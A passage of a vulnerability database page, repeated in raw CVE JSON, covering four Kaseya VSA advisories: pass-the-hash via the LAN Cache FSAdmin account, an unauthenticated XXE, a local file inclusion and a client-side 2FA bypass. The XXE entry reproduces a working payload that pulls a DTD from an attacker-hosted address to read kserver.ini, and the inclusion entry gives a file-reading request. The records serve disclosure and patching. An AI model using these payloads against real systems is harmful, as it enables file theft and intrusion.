    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "An issue was discovered in Kaseya VSA RMM through 9.5.0.22. When using the default configuration, the LAN Cache feature creates a local account FSAdminxxxxxxxxx (e.g., FSAdmin123456789) on the server that hosts the LAN Cache and all clients that are assigned to a LAN Cache. This account is placed into the local Administrators group of all clients assigned to the LAN Cache. When the assigned client is a Domain Controller, the FSAdminxxxxxxxxx account is created as a domain account and automatically added as a member of the domain BUILTIN\\Administrators group. Using the well known Pass-the-Hash techniques, an attacker can use the same FSAdminxxxxxxxxx hash from any LAN Cache client and pass this to a Domain Controller, providing administrative rights to the attacker on any Domain Controller. (Local account Pass-the-Hash mitigations do not protect domain accounts.)"
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2019-10-11T11:44:18",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.kaseya.com/products/vsa/"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://community.kaseya.com/xsp/f/355.aspx"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://lockstepgroup.com/blog/abusing-the-kaseya-lan-cache-fsadmin/"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://lockstepgroup.com/blog/cve-2019-14510-abusing-the-kaseya-lan-cache-fsadmin-red-team-edition/"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://community.kaseya.com/xsp/f/355/t/24675.aspx"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2019-14510",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "An issue was discovered in Kaseya VSA RMM through 9.5.0.22. When using the default configuration, the LAN Cache feature creates a local account FSAdminxxxxxxxxx (e.g., FSAdmin123456789) on the server that hosts the LAN Cache and all clients that are assigned to a LAN Cache. This account is placed into the local Administrators group of all clients assigned to the LAN Cache. When the assigned client is a Domain Controller, the FSAdminxxxxxxxxx account is created as a domain account and automatically added as a member of the domain BUILTIN\\Administrators group. Using the well known Pass-the-Hash techniques, an attacker can use the same FSAdminxxxxxxxxx hash from any LAN Cache client and pass this to a Domain Controller, providing administrative rights to the attacker on any Domain Controller. (Local account Pass-the-Hash mitigations do not protect domain accounts.)"
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://www.kaseya.com/products/vsa/",
              "refsource": "MISC",
              "url": "https://www.kaseya.com/products/vsa/"
            },
            {
              "name": "http://community.kaseya.com/xsp/f/355.aspx",
              "refsource": "MISC",
              "url": "http://community.kaseya.com/xsp/f/355.aspx"
            },
            {
              "name": "https://lockstepgroup.com/blog/abusing-the-kaseya-lan-cache-fsadmin/",
              "refsource": "MISC",
              "url": "https://lockstepgroup.com/blog/abusing-the-kaseya-lan-cache-fsadmin/"
            },
            {
              "name": "https://lockstepgroup.com/blog/cve-2019-14510-abusing-the-kaseya-lan-cache-fsadmin-red-team-edition/",
              "refsource": "MISC",
              "url": "https://lockstepgroup.com/blog/cve-2019-14510-abusing-the-kaseya-lan-cache-fsadmin-red-team-edition/"
            },
            {
              "name": "http://community.kaseya.com/xsp/f/355/t/24675.aspx",
              "refsource": "MISC",
              "url": "http://community.kaseya.com/xsp/f/355/t/24675.aspx"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2019-14510",
    "datePublished": "2019-10-11T11:44:18",
    "dateReserved": "2019-08-01T00:00:00",
    "dateUpdated": "2024-08-05T00:19:41.084Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2021-30201 (GCVE-0-2021-30201)

Vulnerability from nvd – Published: 2021-07-09 13:25 – Updated: 2024-08-03 22:24
Summary
The API /vsaWS/KaseyaWS.asmx can be used to submit XML to the system. When this XML is processed (external) entities are insecurely processed and fetched by the system and returned to the attacker. Detailed description Given the following request: ``` POST /vsaWS/KaseyaWS.asmx HTTP/1.1 Content-Type: text/xml;charset=UTF-8 Host: 192.168.1.194:18081 Content-Length: 406 <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:kas="KaseyaWS"> <soapenv:Header/> <soapenv:Body> <kas:PrimitiveResetPassword> <!--type: string--> <kas:XmlRequest><![CDATA[<!DOCTYPE data SYSTEM "http://192.168.1.170:8080/oob.dtd"><data>&send;</data>]]> </kas:XmlRequest> </kas:PrimitiveResetPassword> </soapenv:Body> </soapenv:Envelope> ``` And the following XML file hosted at http://192.168.1.170/oob.dtd: ``` <!ENTITY % file SYSTEM "file://c:\\kaseya\\kserver\\kserver.ini"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>"> %eval; %error; ``` The server will fetch this XML file and process it, it will read the file c:\\kaseya\\kserver\\kserver.ini and returns the content in the server response like below. Response: ``` HTTP/1.1 500 Internal Server Error Cache-Control: private Content-Type: text/xml; charset=utf-8 Date: Fri, 02 Apr 2021 10:07:38 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 2677 <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><soap:Body><soap:Fault><faultcode>soap:Server</faultcode><faultstring>Server was unable to process request. ---&gt; There is an error in XML document (24, -1000).\r\n\r\nSystem.Xml.XmlException: Fragment identifier '######################################################################## # This is the configuration file for the KServer. 
# Place it in the same directory as the KServer executable
# A blank line or new valid section header [] terminates each section.
# Comment lines start with ; or #
########################################################################
<snip>
```

Security issues discovered
---
* The API insecurely resolves external XML entities
* The API has an overly verbose error response

Impact
---
Using this vulnerability an attacker can read any file on the server the webserver process can read. Additionally, it can be used to perform HTTP(s) requests into the local network and thus use the Kaseya system to pivot into the local network.
CWE
  • n/a
Assigner
Credits
Discovered by Wietse Boonstra of DIVD Additional research by Frank Breedijk of DIVD

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T22:24:59.560Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://helpdesk.kaseya.com/hc/en-gb/articles/360019966738-9-5-6-Feature-Release-8-May-2021"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://csirt.divd.nl/DIVD-2021-00011"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://csirt.divd.nl/CVE-2021-30201"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "value": "Discovered by Wietse Boonstra of DIVD"
        },
        {
          "lang": "en",
          "value": "Additional research by Frank Breedijk of DIVD"
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "The API /vsaWS/KaseyaWS.asmx can be used to submit XML to the system. When this XML is processed (external) entities are insecurely processed and fetched by the system and returned to the attacker. Detailed description Given the following request: ``` POST /vsaWS/KaseyaWS.asmx HTTP/1.1 Content-Type: text/xml;charset=UTF-8 Host: 192.168.1.194:18081 Content-Length: 406 \u003csoapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:kas=\"KaseyaWS\"\u003e \u003csoapenv:Header/\u003e \u003csoapenv:Body\u003e \u003ckas:PrimitiveResetPassword\u003e \u003c!--type: string--\u003e \u003ckas:XmlRequest\u003e\u003c![CDATA[\u003c!DOCTYPE data SYSTEM \"http://192.168.1.170:8080/oob.dtd\"\u003e\u003cdata\u003e\u0026send;\u003c/data\u003e]]\u003e \u003c/kas:XmlRequest\u003e \u003c/kas:PrimitiveResetPassword\u003e \u003c/soapenv:Body\u003e \u003c/soapenv:Envelope\u003e ``` And the following XML file hosted at http://192.168.1.170/oob.dtd: ``` \u003c!ENTITY % file SYSTEM \"file://c:\\\\kaseya\\\\kserver\\\\kserver.ini\"\u003e \u003c!ENTITY % eval \"\u003c!ENTITY \u0026#x25; error SYSTEM \u0027file:///nonexistent/%file;\u0027\u003e\"\u003e %eval; %error; ``` The server will fetch this XML file and process it, it will read the file c:\\\\kaseya\\\\kserver\\\\kserver.ini and returns the content in the server response like below. 
Response: ``` HTTP/1.1 500 Internal Server Error Cache-Control: private Content-Type: text/xml; charset=utf-8 Date: Fri, 02 Apr 2021 10:07:38 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 2677 \u003c?xml version=\"1.0\" encoding=\"utf-8\"?\u003e\u003csoap:Envelope xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\"\u003e\u003csoap:Body\u003e\u003csoap:Fault\u003e\u003cfaultcode\u003esoap:Server\u003c/faultcode\u003e\u003cfaultstring\u003eServer was unable to process request. ---\u0026gt; There is an error in XML document (24, -1000).\\r\\n\\r\\nSystem.Xml.XmlException: Fragment identifier \u0027######################################################################## # This is the configuration file for the KServer. # Place it in the same directory as the KServer executable # A blank line or new valid section header [] terminates each section. # Comment lines start with ; or # ######################################################################## \u003csnip\u003e ``` Security issues discovered --- * The API insecurely resolves external XML entities * The API has an overly verbose error response Impact --- Using this vulnerability an attacker can read any file on the server the webserver process can read. Additionally, it can be used to perform HTTP(s) requests into the local network and thus use the Kaseya system to pivot into the local network."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-04-04T06:25:20",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://helpdesk.kaseya.com/hc/en-gb/articles/360019966738-9-5-6-Feature-Release-8-May-2021"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://csirt.divd.nl/DIVD-2021-00011"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://csirt.divd.nl/CVE-2021-30201"
        }
      ],
      "solutions": [
        {
          "lang": "en",
          "value": "Upgrade to version 9.5.6 or higher"
        }
      ],
      "source": {
        "advisory": "DIVD-2021-00011",
        "discovery": "INTERNAL"
      },
      "title": "Unauthenticated XML External Entity vulnerability in Kaseya VSA \u003c v9.5.6",
      "x_generator": {
        "engine": "Vulnogram 0.0.9"
      },
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2021-30201",
          "STATE": "PUBLIC",
          "TITLE": "Unauthenticated XML External Entity vulnerability in Kaseya VSA \u003c v9.5.6"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "credit": [
          {
            "lang": "eng",
            "value": "Discovered by Wietse Boonstra of DIVD"
          },
          {
            "lang": "eng",
            "value": "Additional research by Frank Breedijk of DIVD"
          }
        ],
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "The API /vsaWS/KaseyaWS.asmx can be used to submit XML to the system. When this XML is processed (external) entities are insecurely processed and fetched by the system and returned to the attacker. Detailed description Given the following request: ``` POST /vsaWS/KaseyaWS.asmx HTTP/1.1 Content-Type: text/xml;charset=UTF-8 Host: 192.168.1.194:18081 Content-Length: 406 \u003csoapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:kas=\"KaseyaWS\"\u003e \u003csoapenv:Header/\u003e \u003csoapenv:Body\u003e \u003ckas:PrimitiveResetPassword\u003e \u003c!--type: string--\u003e \u003ckas:XmlRequest\u003e\u003c![CDATA[\u003c!DOCTYPE data SYSTEM \"http://192.168.1.170:8080/oob.dtd\"\u003e\u003cdata\u003e\u0026send;\u003c/data\u003e]]\u003e \u003c/kas:XmlRequest\u003e \u003c/kas:PrimitiveResetPassword\u003e \u003c/soapenv:Body\u003e \u003c/soapenv:Envelope\u003e ``` And the following XML file hosted at http://192.168.1.170/oob.dtd: ``` \u003c!ENTITY % file SYSTEM \"file://c:\\\\kaseya\\\\kserver\\\\kserver.ini\"\u003e \u003c!ENTITY % eval \"\u003c!ENTITY \u0026#x25; error SYSTEM \u0027file:///nonexistent/%file;\u0027\u003e\"\u003e %eval; %error; ``` The server will fetch this XML file and process it, it will read the file c:\\\\kaseya\\\\kserver\\\\kserver.ini and returns the content in the server response like below. 
Response: ``` HTTP/1.1 500 Internal Server Error Cache-Control: private Content-Type: text/xml; charset=utf-8 Date: Fri, 02 Apr 2021 10:07:38 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 2677 \u003c?xml version=\"1.0\" encoding=\"utf-8\"?\u003e\u003csoap:Envelope xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\"\u003e\u003csoap:Body\u003e\u003csoap:Fault\u003e\u003cfaultcode\u003esoap:Server\u003c/faultcode\u003e\u003cfaultstring\u003eServer was unable to process request. ---\u0026gt; There is an error in XML document (24, -1000).\\r\\n\\r\\nSystem.Xml.XmlException: Fragment identifier \u0027######################################################################## # This is the configuration file for the KServer. # Place it in the same directory as the KServer executable # A blank line or new valid section header [] terminates each section. # Comment lines start with ; or # ######################################################################## \u003csnip\u003e ``` Security issues discovered --- * The API insecurely resolves external XML entities * The API has an overly verbose error response Impact --- Using this vulnerability an attacker can read any file on the server the webserver process can read. Additionally, it can be used to perform HTTP(s) requests into the local network and thus use the Kaseya system to pivot into the local network."
            }
          ]
        },
        "generator": {
          "engine": "Vulnogram 0.0.9"
        },
        "impact": {
          "cvss": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.1"
          }
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/",
              "refsource": "CONFIRM",
              "url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
            },
            {
              "name": "https://helpdesk.kaseya.com/hc/en-gb/articles/360019966738-9-5-6-Feature-Release-8-May-2021",
              "refsource": "CONFIRM",
              "url": "https://helpdesk.kaseya.com/hc/en-gb/articles/360019966738-9-5-6-Feature-Release-8-May-2021"
            },
            {
              "name": "https://csirt.divd.nl/DIVD-2021-00011",
              "refsource": "CONFIRM",
              "url": "https://csirt.divd.nl/DIVD-2021-00011"
            },
            {
              "name": "https://csirt.divd.nl/CVE-2021-30201",
              "refsource": "CONFIRM",
              "url": "https://csirt.divd.nl/CVE-2021-30201"
            }
          ]
        },
        "solution": [
          {
            "lang": "en",
            "value": "Upgrade to version 9.5.6 or higher"
          }
        ],
        "source": {
          "advisory": "DIVD-2021-00011",
          "discovery": "INTERNAL"
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2021-30201",
    "datePublished": "2021-07-09T13:25:37",
    "dateReserved": "2021-04-07T00:00:00",
    "dateUpdated": "2024-08-03T22:24:59.560Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2021-30121 (GCVE-0-2021-30121)

Vulnerability from nvd – Published: 2021-07-09 13:24 – Updated: 2024-08-03 22:24
Summary
Semi-authenticated local file inclusion. The contents of arbitrary files can be returned by the webserver. Example request: `https://x.x.x.x/KLC/js/Kaseya.SB.JS/js.aspx?path=C:\Kaseya\WebPages\dl.asp` A valid sessionId is required but can be easily obtained via CVE-2021-30118.
CWE
  • n/a
Assigner
References
Credits
Discovered by Wietse Boonstra of DIVD Additional research by Frank Breedijk of DIVD

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T22:24:59.547Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://csirt.divd.nl/DIVD-2021-00011"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://csirt.divd.nl/CVE-2021-30121"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "value": "Discovered by Wietse Boonstra of DIVD"
        },
        {
          "lang": "en",
          "value": "Additional research by Frank Breedijk of DIVD"
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Semi-authenticated local file inclusion The contents of arbitrary files can be returned by the webserver Example request: `https://x.x.x.x/KLC/js/Kaseya.SB.JS/js.aspx?path=C:\\Kaseya\\WebPages\\dl.asp` A valid sessionId is required but can be easily obtained via CVE-2021-30118"
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-04-04T06:25:19",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://csirt.divd.nl/DIVD-2021-00011"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://csirt.divd.nl/CVE-2021-30121"
        }
      ],
      "solutions": [
        {
          "lang": "en",
          "value": "Upgrade to a version above 9.5.6"
        }
      ],
      "source": {
        "advisory": "DIVD-2021-00011",
        "discovery": "INTERNAL"
      },
      "title": "(Semi-)Authenticated local file inclusion in Kaseya VSA \u003c v9.5.6",
      "x_generator": {
        "engine": "Vulnogram 0.0.9"
      },
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2021-30121",
          "STATE": "PUBLIC",
          "TITLE": "(Semi-)Authenticated local file inclusion in Kaseya VSA \u003c v9.5.6"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "credit": [
          {
            "lang": "eng",
            "value": "Discovered by Wietse Boonstra of DIVD"
          },
          {
            "lang": "eng",
            "value": "Additional research by Frank Breedijk of DIVD"
          }
        ],
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Semi-authenticated local file inclusion The contents of arbitrary files can be returned by the webserver Example request: `https://x.x.x.x/KLC/js/Kaseya.SB.JS/js.aspx?path=C:\\Kaseya\\WebPages\\dl.asp` A valid sessionId is required but can be easily obtained via CVE-2021-30118"
            }
          ]
        },
        "generator": {
          "engine": "Vulnogram 0.0.9"
        },
        "impact": {
          "cvss": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.1"
          }
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/",
              "refsource": "CONFIRM",
              "url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
            },
            {
              "name": "https://csirt.divd.nl/DIVD-2021-00011",
              "refsource": "CONFIRM",
              "url": "https://csirt.divd.nl/DIVD-2021-00011"
            },
            {
              "name": "https://csirt.divd.nl/CVE-2021-30121",
              "refsource": "CONFIRM",
              "url": "https://csirt.divd.nl/CVE-2021-30121"
            }
          ]
        },
        "solution": [
          {
            "lang": "en",
            "value": "Upgrade to a version above 9.5.6"
          }
        ],
        "source": {
          "advisory": "DIVD-2021-00011",
          "discovery": "INTERNAL"
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2021-30121",
    "datePublished": "2021-07-09T13:24:28",
    "dateReserved": "2021-04-02T00:00:00",
    "dateUpdated": "2024-08-03T22:24:59.547Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2021-30120 (GCVE-0-2021-30120)

Vulnerability from nvd – Published: 2021-07-09 13:22 – Updated: 2024-08-03 22:24
Summary
Kaseya VSA before 9.5.7 allows attackers to bypass the 2FA requirement. The need to use 2FA for authentication is enforced client-side instead of server-side and can be bypassed using a local proxy, thus rendering 2FA useless. Detailed description --- During the login process, after the user authenticates with username and password, the server sends a response to the client with the booleans MFARequired and MFAEnroled. If the attacker has obtained a password of a user and used an intercepting proxy (e.g. Burp Suite) to change the value of MFARequired from True to False, there is no prompt for the second factor, but the user is still logged in.
CWE
  • n/a
Assigner
References
Credits
Discovered by Wietse Boonstra of DIVD

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T22:24:59.669Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://csirt.divd.nl/DIVD-2021-00011"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://csirt.divd.nl/CVE-2021-30120"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "value": "Discovered by Wietse Boonstra of DIVD"
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Kaseya VSA before 9.5.7 allows attackers to bypass the 2FA requirement. The need to use 2FA for authentication is enforced client-side instead of server-side and can be bypassed using a local proxy, thus rendering 2FA useless. Detailed description --- During the login process, after the user authenticates with username and password, the server sends a response to the client with the booleans MFARequired and MFAEnroled. If the attacker has obtained a password of a user and used an intercepting proxy (e.g. Burp Suite) to change the value of MFARequired from True to False, there is no prompt for the second factor, but the user is still logged in."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 9.9,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-04-04T06:25:18",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://csirt.divd.nl/DIVD-2021-00011"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://csirt.divd.nl/CVE-2021-30120"
        }
      ],
      "solutions": [
        {
          "lang": "en",
          "value": "Upgrade to a version above 9.5.6"
        }
      ],
      "source": {
        "advisory": "DIVD-2021-00011",
        "discovery": "INTERNAL"
      },
      "title": "2FA bypass in Kaseya VSA \u003c= v9.5.6",
      "x_generator": {
        "engine": "Vulnogram 0.0.9"
      },
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2021-30120",
          "STATE": "PUBLIC",
          "TITLE": "2FA bypass in Kaseya VSA \u003c= v9.5.6"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "credit": [
          {
            "lang": "eng",
            "value": "Discovered by Wietse Boonstra of DIVD"
          }
        ],
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Kaseya VSA before 9.5.7 allows attackers to bypass the 2FA requirement. The need to use 2FA for authentication is enforced client-side instead of server-side and can be bypassed using a local proxy, thus rendering 2FA useless. Detailed description --- During the login process, after the user authenticates with username and password, the server sends a response to the client with the booleans MFARequired and MFAEnroled. If the attacker has obtained a password of a user and used an intercepting proxy (e.g. Burp Suite) to change the value of MFARequired from True to False, there is no prompt for the second factor, but the user is still logged in."
            }
          ]
        },
        "generator": {
          "engine": "Vulnogram 0.0.9"
        },
        "impact": {
          "cvss": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
